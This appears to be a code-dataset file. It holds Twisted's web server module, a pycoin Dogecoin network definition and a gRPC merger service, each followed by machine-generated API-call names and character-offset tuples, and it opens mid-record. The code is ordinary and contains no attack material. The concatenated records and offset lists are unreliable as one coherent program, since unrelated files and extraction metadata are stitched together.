'yaml.load', 'load', (['s'], {}), '(s)\n', (6663, 6666), False, 'from yaml import dump, load\n')] |
# -*- test-case-name: twisted.web.test.test_web -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
This is a web server which integrates with the twisted.internet infrastructure.
@var NOT_DONE_YET: A token value which L{twisted.web.resource.IResource.render}
implementations can return to indicate that the application will later call
C{.write} and C{.finish} to complete the request, and that the HTTP
connection should be left open.
@type NOT_DONE_YET: Opaque; do not depend on any particular type for this
value.
"""
import copy
import os
import re
from html import escape
from typing import List, Optional
from urllib.parse import quote as _quote
import zlib
from binascii import hexlify
from zope.interface import implementer
from twisted.python.compat import networkString, nativeString
from twisted.spread.pb import Copyable, ViewPoint
from twisted.internet import address, interfaces
from twisted.internet.error import AlreadyCalled, AlreadyCancelled
from twisted.web import iweb, http, util
from twisted.web.http import unquote
from twisted.python import reflect, failure, components
from twisted import copyright
from twisted.web import resource
from twisted.web.error import UnsupportedMethod
from incremental import Version
from twisted.python.deprecate import deprecatedModuleAttribute
from twisted.logger import Logger
NOT_DONE_YET = 1
__all__ = [
"supportedMethods",
"Request",
"Session",
"Site",
"version",
"NOT_DONE_YET",
"GzipEncoderFactory",
]
# backwards compatibility
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.datetimeToString instead",
"twisted.web.server",
"date_time_string",
)
deprecatedModuleAttribute(
Version("Twisted", 12, 1, 0),
"Please use twisted.web.http.stringToDatetime instead",
"twisted.web.server",
"string_date_time",
)
date_time_string = http.datetimeToString
string_date_time = http.stringToDatetime
# Support for other methods may be implemented on a per-resource basis.
supportedMethods = (b"GET", b"HEAD", b"POST")
def quote(string, *args, **kwargs):
return _quote(string.decode("charmap"), *args, **kwargs).encode("charmap")
def _addressToTuple(addr):
if isinstance(addr, address.IPv4Address):
return ("INET", addr.host, addr.port)
elif isinstance(addr, address.UNIXAddress):
return ("UNIX", addr.name)
else:
return tuple(addr)
@implementer(iweb.IRequest)
class Request(Copyable, http.Request, components.Componentized):
"""
An HTTP request.
@ivar defaultContentType: A L{bytes} giving the default I{Content-Type}
value to send in responses if no other value is set. L{None} disables
the default.
@ivar _insecureSession: The L{Session} object representing state that will
be transmitted over plain-text HTTP.
@ivar _secureSession: The L{Session} object representing the state that
will be transmitted only over HTTPS.
"""
defaultContentType = b"text/html"
site = None
appRootURL = None
prepath: Optional[List[bytes]] = None
postpath: Optional[List[bytes]] = None
__pychecker__ = "unusednames=issuer"
_inFakeHead = False
_encoder = None
_log = Logger()
def __init__(self, *args, **kw):
http.Request.__init__(self, *args, **kw)
components.Componentized.__init__(self)
def getStateToCopyFor(self, issuer):
x = self.__dict__.copy()
del x["transport"]
# XXX refactor this attribute out; it's from protocol
# del x['server']
del x["channel"]
del x["content"]
del x["site"]
self.content.seek(0, 0)
x["content_data"] = self.content.read()
x["remote"] = ViewPoint(issuer, self)
# Address objects aren't jellyable
x["host"] = _addressToTuple(x["host"])
x["client"] = _addressToTuple(x["client"])
# Header objects also aren't jellyable.
x["requestHeaders"] = list(x["requestHeaders"].getAllRawHeaders())
return x
# HTML generation helpers
def sibLink(self, name):
"""
Return the text that links to a sibling of the requested resource.
@param name: The sibling resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
if self.postpath:
return (len(self.postpath) * b"../") + name
else:
return name
def childLink(self, name):
"""
Return the text that links to a child of the requested resource.
@param name: The child resource
@type name: C{bytes}
@return: A relative URL.
@rtype: C{bytes}
"""
lpp = len(self.postpath)
if lpp > 1:
return ((lpp - 1) * b"../") + name
elif lpp == 1:
return name
else: # lpp == 0
if len(self.prepath) and self.prepath[-1]:
return self.prepath[-1] + b"/" + name
else:
return name
def gotLength(self, length):
"""
Called when HTTP channel got length of content in this request.
This method is not intended for users.
@param length: The length of the request body, as indicated by the
request headers. L{None} if the request headers do not indicate a
length.
"""
try:
getContentFile = self.channel.site.getContentFile
except AttributeError:
http.Request.gotLength(self, length)
else:
self.content = getContentFile(length)
def process(self):
"""
Process a request.
Find the addressed resource in this request's L{Site},
and call L{self.render()<Request.render()>} with it.
@see: L{Site.getResourceFor()}
"""
# get site from channel
self.site = self.channel.site
# set various default headers
self.setHeader(b"server", version)
self.setHeader(b"date", http.datetimeToString())
# Resource Identification
self.prepath = []
self.postpath = list(map(unquote, self.path[1:].split(b"/")))
# Short-circuit for requests whose path is '*'.
if self.path == b"*":
self._handleStar()
return
try:
resrc = self.site.getResourceFor(self)
if resource._IEncodingResource.providedBy(resrc):
encoder = resrc.getEncoder(self)
if encoder is not None:
self._encoder = encoder
self.render(resrc)
except BaseException:
self.processingFailed(failure.Failure())
def write(self, data):
"""
Write data to the transport (if not responding to a HEAD request).
@param data: A string to write to the response.
@type data: L{bytes}
"""
if not self.startedWriting:
# Before doing the first write, check to see if a default
# Content-Type header should be supplied. We omit it on
# NOT_MODIFIED and NO_CONTENT responses. We also omit it if there
# is a Content-Length header set to 0, as empty bodies don't need
# a content-type.
needsCT = self.code not in (http.NOT_MODIFIED, http.NO_CONTENT)
contentType = self.responseHeaders.getRawHeaders(b"content-type")
contentLength = self.responseHeaders.getRawHeaders(b"content-length")
contentLengthZero = contentLength and (contentLength[0] == b"0")
if (
needsCT
and contentType is None
and self.defaultContentType is not None
and not contentLengthZero
):
self.responseHeaders.setRawHeaders(
b"content-type", [self.defaultContentType]
)
# Only let the write happen if we're not generating a HEAD response by
# faking out the request method. Note, if we are doing that,
# startedWriting will never be true, and the above logic may run
# multiple times. It will only actually change the responseHeaders
# once though, so it's still okay.
if not self._inFakeHead:
if self._encoder:
data = self._encoder.encode(data)
http.Request.write(self, data)
def finish(self):
"""
Override C{http.Request.finish} for possible encoding.
"""
if self._encoder:
data = self._encoder.finish()
if data:
http.Request.write(self, data)
return http.Request.finish(self)
def render(self, resrc):
"""
Ask a resource to render itself.
If the resource does not support the requested method,
generate a C{NOT IMPLEMENTED} or C{NOT ALLOWED} response.
@param resrc: The resource to render.
@type resrc: L{twisted.web.resource.IResource}
@see: L{IResource.render()<twisted.web.resource.IResource.render()>}
"""
try:
body = resrc.render(self)
except UnsupportedMethod as e:
allowedMethods = e.allowedMethods
if (self.method == b"HEAD") and (b"GET" in allowedMethods):
# We must support HEAD (RFC 2616, 5.1.1). If the
# resource doesn't, fake it by giving the resource
# a 'GET' request and then return only the headers,
# not the body.
self._log.info(
"Using GET to fake a HEAD request for {resrc}", resrc=resrc
)
self.method = b"GET"
self._inFakeHead = True
body = resrc.render(self)
if body is NOT_DONE_YET:
self._log.info(
"Tried to fake a HEAD request for {resrc}, but "
"it got away from me.",
resrc=resrc,
)
# Oh well, I guess we won't include the content length.
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self._inFakeHead = False
self.method = b"HEAD"
self.write(b"")
self.finish()
return
if self.method in (supportedMethods):
# We MUST include an Allow header
# (RFC 2616, 10.4.6 and 14.7)
self.setHeader(b"Allow", b", ".join(allowedMethods))
s = (
"""Your browser approached me (at %(URI)s) with"""
""" the method "%(method)s". I only allow"""
""" the method%(plural)s %(allowed)s here."""
% {
"URI": escape(nativeString(self.uri)),
"method": nativeString(self.method),
"plural": ((len(allowedMethods) > 1) and "s") or "",
"allowed": ", ".join([nativeString(x) for x in allowedMethods]),
}
)
epage = resource.ErrorPage(http.NOT_ALLOWED, "Method Not Allowed", s)
body = epage.render(self)
else:
epage = resource.ErrorPage(
http.NOT_IMPLEMENTED,
"Huh?",
"I don't know how to treat a %s request."
% (escape(self.method.decode("charmap")),),
)
body = epage.render(self)
# end except UnsupportedMethod
if body is NOT_DONE_YET:
return
if not isinstance(body, bytes):
body = resource.ErrorPage(
http.INTERNAL_SERVER_ERROR,
"Request did not return bytes",
"Request: "
+ util._PRE(reflect.safe_repr(self))
+ "<br />"
+ "Resource: "
+ util._PRE(reflect.safe_repr(resrc))
+ "<br />"
+ "Value: "
+ util._PRE(reflect.safe_repr(body)),
).render(self)
if self.method == b"HEAD":
if len(body) > 0:
# This is a Bad Thing (RFC 2616, 9.4)
self._log.info(
"Warning: HEAD request {slf} for resource {resrc} is"
" returning a message body. I think I'll eat it.",
slf=self,
resrc=resrc,
)
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(b"")
else:
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
def processingFailed(self, reason):
"""
Finish this request with an indication that processing failed and
possibly display a traceback.
@param reason: Reason this request has failed.
@type reason: L{twisted.python.failure.Failure}
@return: The reason passed to this method.
@rtype: L{twisted.python.failure.Failure}
"""
self._log.failure("", failure=reason)
if self.site.displayTracebacks:
body = (
b"<html><head><title>web.Server Traceback"
b" (most recent call last)</title></head>"
b"<body><b>web.Server Traceback"
b" (most recent call last):</b>\n\n"
+ util.formatFailure(reason)
+ b"\n\n</body></html>\n"
)
else:
body = (
b"<html><head><title>Processing Failed"
b"</title></head><body>"
b"<b>Processing Failed</b></body></html>"
)
self.setResponseCode(http.INTERNAL_SERVER_ERROR)
self.setHeader(b"content-type", b"text/html")
self.setHeader(b"content-length", b"%d" % (len(body),))
self.write(body)
self.finish()
return reason
def view_write(self, issuer, data):
"""Remote version of write; same interface."""
self.write(data)
def view_finish(self, issuer):
"""Remote version of finish; same interface."""
self.finish()
def view_addCookie(self, issuer, k, v, **kwargs):
"""Remote version of addCookie; same interface."""
self.addCookie(k, v, **kwargs)
def view_setHeader(self, issuer, k, v):
"""Remote version of setHeader; same interface."""
self.setHeader(k, v)
def view_setLastModified(self, issuer, when):
"""Remote version of setLastModified; same interface."""
self.setLastModified(when)
def view_setETag(self, issuer, tag):
"""Remote version of setETag; same interface."""
self.setETag(tag)
def view_setResponseCode(self, issuer, code, message=None):
"""
Remote version of setResponseCode; same interface.
"""
self.setResponseCode(code, message)
def view_registerProducer(self, issuer, producer, streaming):
"""Remote version of registerProducer; same interface.
(requires a remote producer.)
"""
self.registerProducer(_RemoteProducerWrapper(producer), streaming)
def view_unregisterProducer(self, issuer):
self.unregisterProducer()
### these calls remain local
_secureSession = None
_insecureSession = None
@property
def session(self):
"""
If a session has already been created or looked up with
L{Request.getSession}, this will return that object. (This will always
be the session that matches the security of the request; so if
C{forceNotSecure} is used on a secure request, this will not return
that session.)
@return: the session attribute
@rtype: L{Session} or L{None}
"""
if self.isSecure():
return self._secureSession
else:
return self._insecureSession
def getSession(self, sessionInterface=None, forceNotSecure=False):
"""
Check if there is a session cookie, and if not, create it.
By default, the cookie with be secure for HTTPS requests and not secure
for HTTP requests. If for some reason you need access to the insecure
cookie from a secure request you can set C{forceNotSecure = True}.
@param forceNotSecure: Should we retrieve a session that will be
transmitted over HTTP, even if this L{Request} was delivered over
HTTPS?
@type forceNotSecure: L{bool}
"""
# Make sure we aren't creating a secure session on a non-secure page
secure = self.isSecure() and not forceNotSecure
if not secure:
cookieString = b"TWISTED_SESSION"
sessionAttribute = "_insecureSession"
else:
cookieString = b"TWISTED_SECURE_SESSION"
sessionAttribute = "_secureSession"
session = getattr(self, sessionAttribute)
if session is not None:
# We have a previously created session.
try:
# Refresh the session, to keep it alive.
session.touch()
except (AlreadyCalled, AlreadyCancelled):
# Session has already expired.
session = None
if session is None:
# No session was created yet for this request.
cookiename = b"_".join([cookieString] + self.sitepath)
sessionCookie = self.getCookie(cookiename)
if sessionCookie:
try:
session = self.site.getSession(sessionCookie)
except KeyError:
pass
# if it still hasn't been set, fix it up.
if not session:
session = self.site.makeSession()
self.addCookie(cookiename, session.uid, path=b"/", secure=secure)
setattr(self, sessionAttribute, session)
if sessionInterface:
return session.getComponent(sessionInterface)
return session
def _prePathURL(self, prepath):
port = self.getHost().port
if self.isSecure():
default = 443
else:
default = 80
if port == default:
hostport = ""
else:
hostport = ":%d" % port
prefix = networkString(
"http%s://%s%s/"
% (
self.isSecure() and "s" or "",
nativeString(self.getRequestHostname()),
hostport,
)
)
path = b"/".join([quote(segment, safe=b"") for segment in prepath])
return prefix + path
def prePathURL(self):
return self._prePathURL(self.prepath)
def URLPath(self):
from twisted.python import urlpath
return urlpath.URLPath.fromRequest(self)
def rememberRootURL(self):
"""
Remember the currently-processed part of the URL for later
recalling.
"""
url = self._prePathURL(self.prepath[:-1])
self.appRootURL = url
def getRootURL(self):
"""
Get a previously-remembered URL.
@return: An absolute URL.
@rtype: L{bytes}
"""
return self.appRootURL
def _handleStar(self):
"""
Handle receiving a request whose path is '*'.
RFC 7231 defines an OPTIONS * request as being something that a client
can send as a low-effort way to probe server capabilities or readiness.
Rather than bother the user with this, we simply fast-path it back to
an empty 200 OK. Any non-OPTIONS verb gets a 405 Method Not Allowed
telling the client they can only use OPTIONS.
"""
if self.method == b"OPTIONS":
self.setResponseCode(http.OK)
else:
self.setResponseCode(http.NOT_ALLOWED)
self.setHeader(b"Allow", b"OPTIONS")
# RFC 7231 says we MUST set content-length 0 when responding to this
# with no body.
self.setHeader(b"Content-Length", b"0")
self.finish()
@implementer(iweb._IRequestEncoderFactory)
class GzipEncoderFactory:
"""
@cvar compressLevel: The compression level used by the compressor, default
to 9 (highest).
@since: 12.3
"""
_gzipCheckRegex = re.compile(br"(:?^|[\s,])gzip(:?$|[\s,])")
compressLevel = 9
def encoderForRequest(self, request):
"""
Check the headers if the client accepts gzip encoding, and encodes the
request if so.
"""
acceptHeaders = b",".join(
request.requestHeaders.getRawHeaders(b"accept-encoding", [])
)
if self._gzipCheckRegex.search(acceptHeaders):
encoding = request.responseHeaders.getRawHeaders(b"content-encoding")
if encoding:
encoding = b",".join(encoding + [b"gzip"])
else:
encoding = b"gzip"
request.responseHeaders.setRawHeaders(b"content-encoding", [encoding])
return _GzipEncoder(self.compressLevel, request)
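# Assumed wiring sketch: the conventional way to attach this factory to a resource is
# twisted.web.resource.EncodingResourceWrapper; "someResource" is a placeholder name.
#
#   wrapped = resource.EncodingResourceWrapper(someResource, [GzipEncoderFactory()])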
@implementer(iweb._IRequestEncoder)
class _GzipEncoder:
"""
An encoder which supports gzip.
@ivar _zlibCompressor: The zlib compressor instance used to compress the
stream.
@ivar _request: A reference to the originating request.
@since: 12.3
"""
_zlibCompressor = None
def __init__(self, compressLevel, request):
self._zlibCompressor = zlib.compressobj(
compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS
)
self._request = request
def encode(self, data):
"""
Write to the request, automatically compressing data on the fly.
"""
if not self._request.startedWriting:
# Remove the content-length header, we can't honor it
# because we compress on the fly.
self._request.responseHeaders.removeHeader(b"content-length")
return self._zlibCompressor.compress(data)
def finish(self):
"""
Finish handling the request, flushing any data from the zlib
buffer.
"""
remain = self._zlibCompressor.flush()
self._zlibCompressor = None
return remain
class _RemoteProducerWrapper:
def __init__(self, remote):
self.resumeProducing = remote.remoteMethod("resumeProducing")
self.pauseProducing = remote.remoteMethod("pauseProducing")
self.stopProducing = remote.remoteMethod("stopProducing")
class Session(components.Componentized):
"""
A user's session with a system.
This utility class contains no functionality, but is used to
represent a session.
@ivar site: The L{Site} that generated the session.
@type site: L{Site}
@ivar uid: A unique identifier for the session.
@type uid: L{bytes}
@ivar _reactor: An object providing L{IReactorTime} to use for scheduling
expiration.
@ivar sessionTimeout: Time after last modification the session will expire,
in seconds.
@type sessionTimeout: L{float}
@ivar lastModified: Time the C{touch()} method was last called (or time the
session was created). A UNIX timestamp as returned by
L{IReactorTime.seconds()}.
@type lastModified: L{float}
"""
sessionTimeout = 900
_expireCall = None
def __init__(self, site, uid, reactor=None):
"""
Initialize a session with a unique ID for that session.
@param reactor: L{IReactorTime} used to schedule expiration of the
session. If C{None}, the reactor associated with I{site} is used.
"""
super().__init__()
if reactor is None:
reactor = site.reactor
self._reactor = reactor
self.site = site
self.uid = uid
self.expireCallbacks = []
self.touch()
self.sessionNamespaces = {}
def startCheckingExpiration(self):
"""
Start expiration tracking.
@return: L{None}
"""
self._expireCall = self._reactor.callLater(self.sessionTimeout, self.expire)
def notifyOnExpire(self, callback):
"""
Call this callback when the session expires or logs out.
"""
self.expireCallbacks.append(callback)
def expire(self):
"""
Expire/logout of the session.
"""
del self.site.sessions[self.uid]
for c in self.expireCallbacks:
c()
self.expireCallbacks = []
if self._expireCall and self._expireCall.active():
self._expireCall.cancel()
# Break reference cycle.
self._expireCall = None
def touch(self):
"""
Mark the session as modified, which resets expiration timer.
"""
self.lastModified = self._reactor.seconds()
if self._expireCall is not None:
self._expireCall.reset(self.sessionTimeout)
version = networkString(f"TwistedWeb/{copyright.version}")
@implementer(interfaces.IProtocolNegotiationFactory)
class Site(http.HTTPFactory):
"""
A web site: manage log, sessions, and resources.
@ivar requestFactory: A factory which is called with (channel)
and creates L{Request} instances. Default to L{Request}.
@ivar displayTracebacks: If set, unhandled exceptions raised during
rendering are returned to the client as HTML. Default to C{False}.
@ivar sessionFactory: factory for sessions objects. Default to L{Session}.
@ivar sessions: Mapping of session IDs to objects returned by
C{sessionFactory}.
@type sessions: L{dict} mapping L{bytes} to L{Session} given the default
C{sessionFactory}
@ivar counter: The number of sessions that have been generated.
@type counter: L{int}
@ivar sessionCheckTime: Deprecated and unused. See
L{Session.sessionTimeout} instead.
"""
counter = 0
requestFactory = Request
displayTracebacks = False
sessionFactory = Session
sessionCheckTime = 1800
_entropy = os.urandom
def __init__(self, resource, requestFactory=None, *args, **kwargs):
"""
@param resource: The root of the resource hierarchy. All request
traversal for requests received by this factory will begin at this
resource.
@type resource: L{IResource} provider
@param requestFactory: Overrides the default requestFactory.
@type requestFactory: C{callable} or C{class}.
@see: L{twisted.web.http.HTTPFactory.__init__}
"""
super().__init__(*args, **kwargs)
self.sessions = {}
self.resource = resource
if requestFactory is not None:
self.requestFactory = requestFactory
def _openLogFile(self, path):
from twisted.python import logfile
return logfile.LogFile(os.path.basename(path), os.path.dirname(path))
def __getstate__(self):
d = self.__dict__.copy()
d["sessions"] = {}
return d
def _mkuid(self):
"""
(internal) Generate an opaque, unique ID for a user's session.
"""
self.counter = self.counter + 1
return hexlify(self._entropy(32))
def makeSession(self):
"""
Generate a new Session instance, and store it for future reference.
"""
uid = self._mkuid()
session = self.sessions[uid] = self.sessionFactory(self, uid)
session.startCheckingExpiration()
return session
def getSession(self, uid):
"""
Get a previously generated session.
@param uid: Unique ID of the session.
@type uid: L{bytes}.
@raise KeyError: If the session is not found.
"""
return self.sessions[uid]
def buildProtocol(self, addr):
"""
Generate a channel attached to this site.
"""
channel = super().buildProtocol(addr)
channel.requestFactory = self.requestFactory
channel.site = self
return channel
isLeaf = 0
def render(self, request):
"""
Redirect because a Site is always a directory.
"""
request.redirect(request.prePathURL() + b"/")
request.finish()
def getChildWithDefault(self, pathEl, request):
"""
Emulate a resource's getChild method.
"""
request.site = self
return self.resource.getChildWithDefault(pathEl, request)
def getResourceFor(self, request):
"""
Get a resource for a request.
This iterates through the resource hierarchy, calling
getChildWithDefault on each resource it finds for a path element,
stopping when it hits an element where isLeaf is true.
"""
request.site = self
# Sitepath is used to determine cookie names between distributed
# servers and disconnected sites.
request.sitepath = copy.copy(request.prepath)
return resource.getChildForRequest(self.resource, request)
# IProtocolNegotiationFactory
def acceptableProtocols(self):
"""
Protocols this server can speak.
"""
baseProtocols = [b"http/1.1"]
if http.H2_ENABLED:
baseProtocols.insert(0, b"h2")
return baseProtocols
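# Hedged end-to-end sketch of serving a Site; this is the standard Twisted pattern,
# but the port number and the static directory below are arbitrary examples:
#
#   from twisted.internet import reactor
#   from twisted.web.static import File
#
#   site = Site(File("/var/www"))
#   reactor.listenTCP(8080, site)
#   reactor.run()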
| [
"twisted.python.components.Componentized.__init__",
"twisted.python.urlpath.URLPath.fromRequest",
"re.compile",
"twisted.logger.Logger",
"twisted.web.resource.getChildForRequest",
"twisted.web.http.Request.gotLength",
"copy.copy",
"zlib.compressobj",
"twisted.web.resource._IEncodingResource.providedBy",
"twisted.spread.pb.ViewPoint",
"incremental.Version",
"os.path.dirname",
"twisted.python.failure.Failure",
"twisted.python.compat.nativeString",
"twisted.python.reflect.safe_repr",
"twisted.web.http.Request.finish",
"twisted.web.resource.ErrorPage",
"zope.interface.implementer",
"twisted.web.http.datetimeToString",
"twisted.python.compat.networkString",
"twisted.web.http.Request.__init__",
"os.path.basename",
"twisted.web.util.formatFailure",
"twisted.web.http.Request.write"
] | [((2482, 2508), 'zope.interface.implementer', 'implementer', (['iweb.IRequest'], {}), '(iweb.IRequest)\n', (2493, 2508), False, 'from zope.interface import implementer\n'), ((20318, 20359), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoderFactory'], {}), '(iweb._IRequestEncoderFactory)\n', (20329, 20359), False, 'from zope.interface import implementer\n'), ((21320, 21354), 'zope.interface.implementer', 'implementer', (['iweb._IRequestEncoder'], {}), '(iweb._IRequestEncoder)\n', (21331, 21354), False, 'from zope.interface import implementer\n'), ((25192, 25240), 'twisted.python.compat.networkString', 'networkString', (['f"""TwistedWeb/{copyright.version}"""'], {}), "(f'TwistedWeb/{copyright.version}')\n", (25205, 25240), False, 'from twisted.python.compat import networkString, nativeString\n'), ((25244, 25295), 'zope.interface.implementer', 'implementer', (['interfaces.IProtocolNegotiationFactory'], {}), '(interfaces.IProtocolNegotiationFactory)\n', (25255, 25295), False, 'from zope.interface import implementer\n'), ((1605, 1633), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1612, 1633), False, 'from incremental import Version\n'), ((1778, 1806), 'incremental.Version', 'Version', (['"""Twisted"""', '(12)', '(1)', '(0)'], {}), "('Twisted', 12, 1, 0)\n", (1785, 1806), False, 'from incremental import Version\n'), ((3294, 3302), 'twisted.logger.Logger', 'Logger', ([], {}), '()\n', (3300, 3302), False, 'from twisted.logger import Logger\n'), ((20546, 20589), 're.compile', 're.compile', (["b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])'"], {}), "(b'(:?^|[\\\\s,])gzip(:?$|[\\\\s,])')\n", (20556, 20589), False, 'import re\n'), ((3349, 3389), 'twisted.web.http.Request.__init__', 'http.Request.__init__', (['self', '*args'], {}), '(self, *args, **kw)\n', (3370, 3389), False, 'from twisted.web import iweb, http, util\n'), ((3398, 3437), 'twisted.python.components.Componentized.__init__', 'components.Componentized.__init__', (['self'], {}), '(self)\n', (3431, 3437), False, 'from twisted.python import reflect, failure, components\n'), ((3802, 3825), 'twisted.spread.pb.ViewPoint', 'ViewPoint', (['issuer', 'self'], {}), '(issuer, self)\n', (3811, 3825), False, 'from twisted.spread.pb import Copyable, ViewPoint\n'), ((8744, 8769), 'twisted.web.http.Request.finish', 'http.Request.finish', (['self'], {}), '(self)\n', (8763, 8769), False, 'from twisted.web import iweb, http, util\n'), ((19036, 19069), 'twisted.python.urlpath.URLPath.fromRequest', 'urlpath.URLPath.fromRequest', (['self'], {}), '(self)\n', (19063, 19069), False, 'from twisted.python import urlpath\n'), ((21708, 21775), 'zlib.compressobj', 'zlib.compressobj', (['compressLevel', 'zlib.DEFLATED', '(16 + zlib.MAX_WBITS)'], {}), '(compressLevel, zlib.DEFLATED, 16 + zlib.MAX_WBITS)\n', (21724, 21775), False, 'import zlib\n'), ((29168, 29194), 'copy.copy', 'copy.copy', (['request.prepath'], {}), '(request.prepath)\n', (29177, 29194), False, 'import copy\n'), ((29210, 29261), 'twisted.web.resource.getChildForRequest', 'resource.getChildForRequest', (['self.resource', 'request'], {}), '(self.resource, request)\n', (29237, 29261), False, 'from twisted.web import resource\n'), ((6104, 6127), 'twisted.web.http.datetimeToString', 'http.datetimeToString', ([], {}), '()\n', (6125, 6127), False, 'from twisted.web import iweb, http, util\n'), ((6477, 6522), 'twisted.web.resource._IEncodingResource.providedBy', 'resource._IEncodingResource.providedBy', (['resrc'], {}), '(resrc)\n', (6515, 
6522), False, 'from twisted.web import resource\n'), ((8452, 8482), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8470, 8482), False, 'from twisted.web import iweb, http, util\n'), ((27104, 27126), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (27120, 27126), False, 'import os\n'), ((27128, 27149), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (27143, 27149), False, 'import os\n'), ((5578, 5614), 'twisted.web.http.Request.gotLength', 'http.Request.gotLength', (['self', 'length'], {}), '(self, length)\n', (5600, 5614), False, 'from twisted.web import iweb, http, util\n'), ((8698, 8728), 'twisted.web.http.Request.write', 'http.Request.write', (['self', 'data'], {}), '(self, data)\n', (8716, 8728), False, 'from twisted.web import iweb, http, util\n'), ((6752, 6769), 'twisted.python.failure.Failure', 'failure.Failure', ([], {}), '()\n', (6767, 6769), False, 'from twisted.python import reflect, failure, components\n'), ((11281, 11342), 'twisted.web.resource.ErrorPage', 'resource.ErrorPage', (['http.NOT_ALLOWED', '"""Method Not Allowed"""', 's'], {}), "(http.NOT_ALLOWED, 'Method Not Allowed', s)\n", (11299, 11342), False, 'from twisted.web import resource\n'), ((13642, 13668), 'twisted.web.util.formatFailure', 'util.formatFailure', (['reason'], {}), '(reason)\n', (13660, 13668), False, 'from twisted.web import iweb, http, util\n'), ((11024, 11049), 'twisted.python.compat.nativeString', 'nativeString', (['self.method'], {}), '(self.method)\n', (11036, 11049), False, 'from twisted.python.compat import networkString, nativeString\n'), ((10965, 10987), 'twisted.python.compat.nativeString', 'nativeString', (['self.uri'], {}), '(self.uri)\n', (10977, 10987), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12242, 12265), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['body'], {}), '(body)\n', (12259, 12265), False, 'from twisted.python import reflect, failure, components\n'), ((11174, 11189), 'twisted.python.compat.nativeString', 'nativeString', (['x'], {}), '(x)\n', (11186, 11189), False, 'from twisted.python.compat import networkString, nativeString\n'), ((12133, 12157), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['resrc'], {}), '(resrc)\n', (12150, 12157), False, 'from twisted.python import reflect, failure, components\n'), ((12022, 12045), 'twisted.python.reflect.safe_repr', 'reflect.safe_repr', (['self'], {}), '(self)\n', (12039, 12045), False, 'from twisted.python import reflect, failure, components\n')] |
from pycoin.networks.bitcoinish import create_bitcoinish_network
network = create_bitcoinish_network(
symbol="DOGE", network_name="Dogecoin", subnet_name="mainnet",
wif_prefix_hex="9e", address_prefix_hex="1e", pay_to_script_prefix_hex="16",
bip32_prv_prefix_hex="<KEY>", bip32_pub_prefix_hex="<KEY>")
| [
"pycoin.networks.bitcoinish.create_bitcoinish_network"
] | [((76, 313), 'pycoin.networks.bitcoinish.create_bitcoinish_network', 'create_bitcoinish_network', ([], {'symbol': '"""DOGE"""', 'network_name': '"""Dogecoin"""', 'subnet_name': '"""mainnet"""', 'wif_prefix_hex': '"""9e"""', 'address_prefix_hex': '"""1e"""', 'pay_to_script_prefix_hex': '"""16"""', 'bip32_prv_prefix_hex': '"""<KEY>"""', 'bip32_pub_prefix_hex': '"""<KEY>"""'}), "(symbol='DOGE', network_name='Dogecoin',\n subnet_name='mainnet', wif_prefix_hex='9e', address_prefix_hex='1e',\n pay_to_script_prefix_hex='16', bip32_prv_prefix_hex='<KEY>',\n bip32_pub_prefix_hex='<KEY>')\n", (101, 313), False, 'from pycoin.networks.bitcoinish import create_bitcoinish_network\n')] |
import logging
from grpc_health.v1 import health_pb2, health_pb2_grpc
from grpc_health.v1.health import HealthServicer
from needlestack.apis import servicers_pb2_grpc
from needlestack.servicers import factory
from needlestack.servicers.merger import MergerServicer
from examples import configs
logging.getLogger("kazoo").setLevel("WARN")
def main():
config = configs.LocalDockerConfig()
server = factory.create_server(config)
manager = factory.create_zookeeper_cluster_manager(config)
manager.startup()
servicers_pb2_grpc.add_MergerServicer_to_server(MergerServicer(config, manager), server)
health = HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(health, server)
health.set("Merger", health_pb2.HealthCheckResponse.SERVING)
factory.serve(server)
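
# Illustrative sketch (not part of the original module): the HealthServicer
# registered above implements the standard gRPC health-checking protocol, so a
# client can probe the "Merger" service roughly as below. The target address is
# an assumption made for the example.
def check_merger_health(target="localhost:50051"):
    import grpc

    with grpc.insecure_channel(target) as channel:
        stub = health_pb2_grpc.HealthStub(channel)
        response = stub.Check(health_pb2.HealthCheckRequest(service="Merger"))
        return response.status == health_pb2.HealthCheckResponse.SERVING
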
if __name__ == "__main__":
main()
| [
"examples.configs.LocalDockerConfig",
"logging.getLogger",
"needlestack.servicers.factory.create_zookeeper_cluster_manager",
"needlestack.servicers.merger.MergerServicer",
"grpc_health.v1.health.HealthServicer",
"needlestack.servicers.factory.serve",
"needlestack.servicers.factory.create_server",
"grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server"
] | [((369, 396), 'examples.configs.LocalDockerConfig', 'configs.LocalDockerConfig', ([], {}), '()\n', (394, 396), False, 'from examples import configs\n'), ((411, 440), 'needlestack.servicers.factory.create_server', 'factory.create_server', (['config'], {}), '(config)\n', (432, 440), False, 'from needlestack.servicers import factory\n'), ((455, 503), 'needlestack.servicers.factory.create_zookeeper_cluster_manager', 'factory.create_zookeeper_cluster_manager', (['config'], {}), '(config)\n', (495, 503), False, 'from needlestack.servicers import factory\n'), ((634, 650), 'grpc_health.v1.health.HealthServicer', 'HealthServicer', ([], {}), '()\n', (648, 650), False, 'from grpc_health.v1.health import HealthServicer\n'), ((655, 715), 'grpc_health.v1.health_pb2_grpc.add_HealthServicer_to_server', 'health_pb2_grpc.add_HealthServicer_to_server', (['health', 'server'], {}), '(health, server)\n', (699, 715), False, 'from grpc_health.v1 import health_pb2, health_pb2_grpc\n'), ((786, 807), 'needlestack.servicers.factory.serve', 'factory.serve', (['server'], {}), '(server)\n', (799, 807), False, 'from needlestack.servicers import factory\n'), ((298, 324), 'logging.getLogger', 'logging.getLogger', 